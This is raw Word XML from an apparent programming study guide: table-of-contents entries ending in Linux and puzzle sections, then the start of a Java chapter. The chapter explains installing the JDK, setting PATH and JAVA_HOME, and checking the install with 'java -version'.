            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1294</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08DF2FF4" w14:textId="120A3E2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6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7868169 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1294</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="753F4A60" w14:textId="24FCF8B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7868170 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1295</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1815418F" w14:textId="3673B52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7868171 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1295</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0280C805" w14:textId="05CE474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2"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7868172 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1296</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21861CB8" w14:textId="3B4FA91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7868173 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1297</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31087B77" w14:textId="3E0C7503"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7868174 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1297</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D754CB0" w14:textId="1E396C5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7868175 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1298</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="080BC838" w14:textId="7D3D3EC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6"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7868176 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1299</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="470CBC5F" w14:textId="1DF8C876"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7868177 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1300</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EA372E9" w14:textId="668F6267"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7868178 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1300</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F7C2BC9" w14:textId="2954934D"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7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7868179 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1301</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09A8A161" w14:textId="2246A3A2"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0"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7868180 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1302</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2543B452" w14:textId="25200AC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1"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7868181 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1303</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31697C77" w14:textId="05BA94C1"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82" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868182 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1305</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36D8B06E" w14:textId="4EE1091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3"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7868183 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1305</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31F54594" w14:textId="1A42B414"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4"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7868184 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1307</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="297AFB89" w14:textId="6DBA46A0"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5"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7868185 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1307</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E107628" w14:textId="576020A1" w:rsidR="00B502F6" w:rsidRDefault="00B502F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7868186" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Puzzles</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868186 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1308</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0891D000" w14:textId="68BA234B"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7"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uzzle – 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868187 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1308</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CE54007" w14:textId="4ED15321"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8"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uzzle – 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868188 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1308</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61D636F0" w14:textId="709CC735" w:rsidR="00B502F6" w:rsidRDefault="00B502F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7868189" w:history="1">
            <w:r w:rsidRPr="006E6F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E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Puzzle – 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868189 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1308</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="318CDD27" w14:textId="720692B1" w:rsidR="006C086A" w:rsidRPr="00CE4B95" w:rsidRDefault="006C086A">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CE4B95">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2AFF609F" w14:textId="6916AC90" w:rsidR="006C086A" w:rsidRPr="00CE4B95" w:rsidRDefault="006C086A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E6EF2C" w14:textId="5E72AD30" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6E50" w:rsidP="00A51164">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc197867214"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="52072542" w14:textId="125A028D" w:rsidR="00341B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00341B56" w:rsidP="00341B56">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc197867215"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Java Fundamentals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="353AEC40" w14:textId="77777777" w:rsidR="006D5864" w:rsidRPr="00CE4B95" w:rsidRDefault="006D5864" w:rsidP="006D5864">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0010B05C" w14:textId="4191B226" w:rsidR="00231E5A" w:rsidRPr="00CE4B95" w:rsidRDefault="00231E5A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc197867216"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Explain how to install java? Explain directories in it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2902956B" w14:textId="1016C383" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="00646C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 1: Download Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C55E77" w14:textId="421835F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the official Oracle website or use OpenJDK: Oracle JDK / OpenJDK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5109DE6A" w14:textId="77777777" w:rsidR="00B87437" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87437" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A23623" w14:textId="320B3A65"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2: Choose Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03B23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Choose the appropriate JDK version (e.g., Java 17 or Java 21 – latest LTS versions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B83BAB6"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lect the installer for your operating system (Windows, macOS, Linux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F9EC5" w14:textId="77777777" w:rsidR="00B87437" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87437" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293515E5" w14:textId="4FB7F454"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3: Install Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E06CB84"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Run the .exe installer and follow the wizard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BAF07D" w14:textId="301FAF7A"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It installs Java to a default path like: C:\Program Files\Java\jdk-21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E6AA0F" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A8A568" w14:textId="4A9BAA72"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macOS/Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D1E09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Use .tar.gz or package managers like Homebrew, apt, yum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12307E0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udo apt install openjdk-21-jdk  # For Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E119B68" w14:textId="77777777" w:rsidR="00B87437" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87437" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695F49DA" w14:textId="55EA0068"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4: Set Environment Variables (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A112D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System Properties &gt; Environment Variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495C8DC8" w14:textId="77777777" w:rsidR="0092095F" w:rsidRPr="00CE4B95" w:rsidRDefault="0092095F" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479D8699" w14:textId="476A019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Add to Path: C:\Program Files\Java\jdk-21\bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39CD4C" w14:textId="3A7EEBA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t JAVA_HOME: JAVA_HOME = C:\Program Files\Java\jdk-21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA5786" w14:textId="77777777" w:rsidR="00B87437" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87437" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D85E08F" w14:textId="3C2C13D6"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5: Verify Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0404A2D9"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Open a terminal/command prompt and run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF8689C" w14:textId="77777777" w:rsidR="00756AFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00756AFF" w:rsidP="0092095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606C0A42" w14:textId="77777777"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 -version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C3C9FA" w14:textId="2BD26344"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c -version</w:t>
      </w:r>
    </w:p>
